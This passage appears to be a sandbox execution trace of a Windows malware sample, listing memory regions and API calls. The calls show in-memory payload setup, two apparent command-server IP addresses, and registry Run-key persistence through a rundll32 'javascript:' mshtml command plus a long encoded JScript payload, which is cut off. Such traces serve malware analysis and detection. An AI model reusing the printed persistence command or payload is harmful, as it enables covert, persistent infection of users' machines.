"nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1195 start_va = 0x740000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1196 start_va = 0x776e0000 end_va = 0x77736fff entry_point = 0x776f9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1197 start_va = 0x77370000 end_va = 0x77464fff entry_point = 0x77371865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1198 start_va = 0x77590000 end_va = 0x776c5fff entry_point = 0x77591b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1199 start_va = 0x76ce0000 end_va = 0x76d6efff entry_point = 0x76ce3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1200 start_va = 0x77740000 end_va = 0x7785cfff entry_point = 0x7774158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1201 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c3238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1202 start_va = 0x759a0000 end_va = 0x75b9afff entry_point = 0x759a22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1203 start_va = 0x76b00000 end_va = 0x76b29fff entry_point = 0x76b012fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1204 start_va = 0x870000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1205 start_va = 0x75710000 end_va = 0x75726fff entry_point = 0x75711c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1206 start_va = 0x75700000 end_va = 0x7570afff entry_point = 0x75701992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1207 start_va = 0x4190000 end_va = 0x445efff entry_point = 0x4190000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1208 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1209 start_va = 0x890000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1210 start_va = 0x960000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1211 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1212 start_va = 0x73fd0000 end_va = 0x7404ffff entry_point = 0x73fe37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1213 start_va = 0x4460000 end_va = 0x466ffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1214 start_va = 0x740000 end_va = 0x81efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1215 start_va = 0x830000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1216 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1217 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1218 start_va = 0x900000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1219 start_va = 0x44b0000 end_va = 0x44effff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 1220 start_va = 0x4630000 end_va = 0x466ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 1221 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1222 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1223 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1224 start_va = 0x75560000 end_va = 0x756fdfff entry_point = 0x7558e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1225 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0xc0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1226 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1227 start_va = 0x75ca0000 end_va = 0x768e9fff entry_point = 0x75d21601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1228 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1229 start_va = 0xe0000 end_va = 0xebfff entry_point = 0xe0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1230 start_va = 0x4550000 end_va = 0x458ffff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 1231 start_va = 0x45c0000 end_va = 0x45fffff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 1232 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1234 start_va = 0xf0000 end_va = 0xf7fff entry_point = 0xf0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1235 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x100000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1236 start_va = 0x75430000 end_va = 0x75450fff entry_point = 0x7543145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1237 start_va = 0x771c0000 end_va = 0x77204fff entry_point = 0x771c11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1238 start_va = 0x73960000 end_va = 0x739a3fff entry_point = 0x73960000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1243 start_va = 0x870000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1244 start_va = 0x75780000 end_va = 0x7579bfff entry_point = 0x75780000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1245 start_va = 0x75770000 end_va = 0x75776fff entry_point = 0x75770000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1246 start_va = 0x75730000 end_va = 0x7576bfff entry_point = 0x75730000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1247 start_va = 0x4670000 end_va = 0x486ffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 1248 start_va = 0x75550000 end_va = 0x75554fff entry_point = 0x75550000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1249 start_va = 0x75540000 end_va = 0x7554ffff entry_point = 0x75540000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1250 start_va = 0x4670000 end_va = 0x481ffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 1251 start_va = 0x4830000 end_va = 0x486ffff entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 1252 start_va = 0x190000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1253 start_va = 0x75530000 end_va = 0x7553ffff entry_point = 0x75530000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 1254 start_va = 0x75510000 end_va = 0x75521fff entry_point = 0x75510000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 1255 start_va = 0x75500000 end_va = 0x75507fff entry_point = 0x75500000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 1256 start_va = 0x754c0000 end_va = 0x754f7fff entry_point = 0x754c0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1257 start_va = 0x4670000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 1258 start_va = 0x4810000 end_va = 0x481ffff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 1259 start_va = 0x754b0000 end_va = 0x754b5fff entry_point = 0x754b0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Thread: id = 39 os_tid = 0x26c [0091.734] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualAlloc") returned 0x76f11856 [0091.734] VirtualAlloc (lpAddress=0x0, dwSize=0x232d000, flAllocationType=0x3000, flProtect=0x40) returned 0x1e60000 [0091.735] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76f00000 [0091.735] GetProcAddress (hModule=0x76f00000, lpProcName="GetModuleHandleA") returned 0x76f11245 [0091.736] GetProcAddress (hModule=0x76f00000, lpProcName="GetProcAddress") returned 0x76f11222 [0091.736] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77c60000 [0091.736] GetProcAddress (hModule=0x77c60000, lpProcName="atoi") returned 0x77cad2f3 [0091.736] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75820000 [0091.739] GetProcAddress (hModule=0x75820000, lpProcName=0x10) returned 0x75826b0e [0091.739] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x776e0000 [0091.740] GetProcAddress (hModule=0x776e0000, lpProcName="StrStrA") returned 0x7770c45b [0091.740] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x77370000 [0091.749] GetProcAddress (hModule=0x77370000, lpProcName="InternetCrackUrlA") returned 0x7737d075 [0091.749] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76bf0000 [0091.749] GetProcAddress (hModule=0x76bf0000, lpProcName="UuidCreateSequential") returned 0x76c17c12 [0091.749] LoadLibraryA (lpLibFileName="imagehlp.dll") returned 0x76b00000 [0091.751] GetProcAddress (hModule=0x76b00000, lpProcName="CheckSumMappedFile") returned 0x76b08303 [0091.751] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x75710000 [0091.755] GetProcAddress (hModule=0x75710000, lpProcName="CreateEnvironmentBlock") returned 0x75711a7a [0091.755] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76b50000 [0091.755] GetProcAddress (hModule=0x76b50000, lpProcName="RegCloseKey") returned 0x76b6469d [0091.755] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77210000 [0091.755] GetProcAddress (hModule=0x77210000, lpProcName="CoInitialize") returned 0x7722b636 [0092.188] VirtualProtect (in: lpAddress=0x1e6015f, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x20f1fc | out: lpflOldProtect=0x20f1fc*=0x40) returned 1 [0092.188] VirtualProtect (in: lpAddress=0x1e6015f, dwSize=0x78, flNewProtect=0x40, lpflOldProtect=0x20f1fc | out: lpflOldProtect=0x20f1fc*=0x4) returned 1 [0092.188] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c60000 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="atoi") returned 0x77cad2f3 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="sscanf") returned 0x77d354a7 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="strncpy") returned 0x77cd5c30 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="ZwSetValueKey") returned 0x77c801b4 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="ZwQueryValueKey") returned 0x77c7fa98 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="ZwQueueApcThread") returned 0x77c7ff14 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="ZwCreateKey") returned 0x77c7fb30 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="RtlRandom") returned 0x77d298c3 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="_snprintf") returned 0x77d34760 [0092.188] GetProcAddress (hModule=0x77c60000, lpProcName="_vsnprintf") returned 0x77cd9d88 [0092.189] GetProcAddress (hModule=0x77c60000, lpProcName="RtlImageNtHeader") returned 0x77c93164 [0092.189] GetProcAddress (hModule=0x77c60000, lpProcName="_chkstk") returned 0x77c9ad68 [0092.189] GetProcAddress (hModule=0x77c60000, lpProcName="memset") returned 0x77c8df20 [0092.189] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x75820000 [0092.189] GetProcAddress (hModule=0x75820000, lpProcName=0x10) returned 0x75826b0e [0092.189] GetProcAddress (hModule=0x75820000, lpProcName=0x73) returned 0x75823ab2 [0092.189] GetProcAddress (hModule=0x75820000, lpProcName=0x3) returned 0x75823918 [0092.189] GetProcAddress (hModule=0x75820000, lpProcName=0x13) returned 0x75826f01 [0092.189] GetProcAddress (hModule=0x75820000, lpProcName=0x4) returned 0x75826bdd [0092.189] GetProcAddress (hModule=0x75820000, lpProcName=0x34) returned 0x75837673 [0092.189] GetProcAddress (hModule=0x75820000, lpProcName=0x17) returned 0x75823eb8 [0092.189] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x776e0000 [0092.189] GetProcAddress (hModule=0x776e0000, lpProcName="StrStrA") returned 0x7770c45b [0092.189] GetProcAddress (hModule=0x776e0000, lpProcName="PathUnquoteSpacesA") returned 0x7770ecc7 [0092.189] GetProcAddress (hModule=0x776e0000, lpProcName="PathFindFileNameA") returned 0x776f00aa [0092.190] GetProcAddress (hModule=0x776e0000, lpProcName="StrCmpNIA") returned 0x776ed11c [0092.190] GetProcAddress (hModule=0x776e0000, lpProcName="StrChrA") returned 0x776ec5e6 [0092.190] GetProcAddress (hModule=0x776e0000, lpProcName="StrStrIA") returned 0x776ed250 [0092.190] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x77370000 [0092.190] GetProcAddress (hModule=0x77370000, lpProcName="InternetCrackUrlA") returned 0x7737d075 [0092.190] GetModuleHandleA (lpModuleName="RPCRT4.dll") returned 0x76bf0000 [0092.190] GetProcAddress (hModule=0x76bf0000, lpProcName="UuidCreateSequential") returned 0x76c17c12 [0092.190] GetModuleHandleA (lpModuleName="imagehlp.dll") returned 0x76b00000 [0092.190] GetProcAddress (hModule=0x76b00000, lpProcName="CheckSumMappedFile") returned 0x76b08303 [0092.190] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x75710000 [0092.190] GetProcAddress (hModule=0x75710000, lpProcName="CreateEnvironmentBlock") returned 0x75711a7a [0092.190] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x76f00000 [0092.190] GetProcAddress (hModule=0x76f00000, lpProcName="ExitThread") returned 0x77cbd598 [0092.190] GetProcAddress (hModule=0x76f00000, lpProcName="ExitProcess") returned 0x76f17a10 [0092.190] GetProcAddress (hModule=0x76f00000, lpProcName="GetModuleFileNameA") returned 0x76f114b1 [0092.190] GetProcAddress (hModule=0x76f00000, lpProcName="CreateEventA") returned 0x76f1328c [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="TerminateThread") returned 0x76f17a2f [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="WinExec") returned 0x76f92c21 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="WriteFile") returned 0x76f11282 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="CreateFileA") returned 0x76f153c6 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="GetTempFileNameA") returned 0x76f39d3f [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="GetTempPathA") returned 0x76f3276c [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="Sleep") returned 0x76f110ff [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="TerminateProcess") returned 0x76f2d802 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="GetExitCodeThread") returned 0x76f2d5b5 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="WaitForSingleObject") returned 0x76f11136 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="ResumeThread") returned 0x76f143ef [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="WriteProcessMemory") returned 0x76f2d9e0 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualAllocEx") returned 0x76f2d9b0 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="CreateProcessA") returned 0x76f11072 [0092.191] GetProcAddress (hModule=0x76f00000, lpProcName="ExpandEnvironmentStringsA") returned 0x76f2eb39 [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="GetTickCount") returned 0x76f1110c [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="GetVersionExA") returned 0x76f13519 [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="CloseHandle") returned 0x76f11410 [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="LoadLibraryA") returned 0x76f149d7 [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="GetProcAddress") returned 0x76f11222 [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="lstrcmpiA") returned 0x76f13e8e [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="GetLastError") returned 0x76f111c0 [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="GetModuleHandleA") returned 0x76f11245 [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualFree") returned 0x76f1186e [0092.192] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualAlloc") returned 0x76f11856 [0092.192] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76b50000 [0092.192] GetProcAddress (hModule=0x76b50000, lpProcName="RegSetValueExW") returned 0x76b614d6 [0092.192] GetProcAddress (hModule=0x76b50000, lpProcName="RegQueryValueExW") returned 0x76b646ad [0092.192] GetProcAddress (hModule=0x76b50000, lpProcName="RegQueryValueExA") returned 0x76b648ef [0092.192] GetProcAddress (hModule=0x76b50000, lpProcName="RegSetValueExA") returned 0x76b614b3 [0092.192] GetProcAddress (hModule=0x76b50000, lpProcName="RegCreateKeyExA") returned 0x76b61469 [0092.193] GetProcAddress (hModule=0x76b50000, lpProcName="RegCloseKey") returned 0x76b6469d [0092.193] GetProcAddress (hModule=0x76b50000, lpProcName="OpenProcessToken") returned 0x76b64304 [0092.193] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x77210000 [0092.193] GetProcAddress (hModule=0x77210000, lpProcName="CoInitialize") returned 0x7722b636 [0092.193] UuidCreateSequential (in: Uuid=0x20f0ec | out: Uuid=0x20f0ec) returned 0x0 [0092.194] _snprintf (in: _Dest=0x418a648, _Count=0x103, _Format="%x%x%x%x%x%x" | out: _Dest="0187481c69") returned 10 [0092.194] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName="0187481c69") returned 0xa4 [0092.195] GetLastError () returned 0x0 [0092.195] GetModuleHandleA (lpModuleName=0x0) returned 0xa50000 [0092.195] GetModuleFileNameA (in: hModule=0xa50000, lpFilename=0x20f108, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe")) returned 0x1f [0092.195] StrStrIA (lpFirst="C:\\Windows\\syswow64\\dllhost.exe", lpSrch="powershell.exe") returned 0x0 [0092.197] RtlImageNtHeader (BaseAddress=0x61104) returned 0x61144 [0092.197] strncpy (in: _Dest=0x2167248, _Source="060414;8;178.89.159.34,178.89.159.35;1", _Count=0x1000 | out: _Dest="060414;8;178.89.159.34,178.89.159.35;1") returned="060414;8;178.89.159.34,178.89.159.35;1" [0092.197] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x75860000 [0092.197] GetProcAddress (hModule=0x75860000, lpProcName="_beginthreadex") returned 0x7587132e [0092.197] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x1e61c77, _ArgList=0x0, _InitFlag=0x0, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa8 [0092.198] CloseHandle (hObject=0xa8) returned 1 [0092.198] RtlExitUserThread (Status=0x2a) Thread: id = 40 os_tid = 0x718 [0092.199] CoInitialize (pvReserved=0x0) returned 0x0 [0092.214] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x1e61133, _ArgList=0x0, _InitFlag=0x0, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xc4 [0092.214] CloseHandle (hObject=0xc4) returned 1 [0092.215] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x1e61af5, _ArgList=0x0, _InitFlag=0x0, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xc4 [0092.215] CloseHandle (hObject=0xc4) returned 1 Thread: id = 41 os_tid = 0x320 [0092.219] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0xa8, lpdwDisposition=0x0) returned 0x0 [0092.220] NtQueryValueKey (in: KeyHandle=0xa8, ValueName="", KeyValueInformationClass=0x2, KeyValueInformation=0x2064030, Length=0x2000, ResultLength=0x2064028 | out: KeyValueInformation=0x2064030*(TitleIndex=0x0, Type=0x1, DataLength=0x1d0, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")"), ResultLength=0x2064028) returned 0x0 [0092.220] RegQueryValueExW (in: hKey=0xa8, lpValueName=0x0, lpReserved=0x0, lpType=0x0, lpData=0x1e64028, lpcbData=0x1e64024*=0x200000 | out: lpType=0x0, lpData=0x1e64028*=0x23, lpcbData=0x1e64024*=0xef54) returned 0x0 [0092.224] RegCloseKey (hKey=0xa8) returned 0x0 [0092.224] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0xa8, lpdwDisposition=0x0) returned 0x0 [0092.224] NtSetValueKey (in: KeyHandle=0xa8, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0092.224] RegSetValueExW (in: hKey=0xa8, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 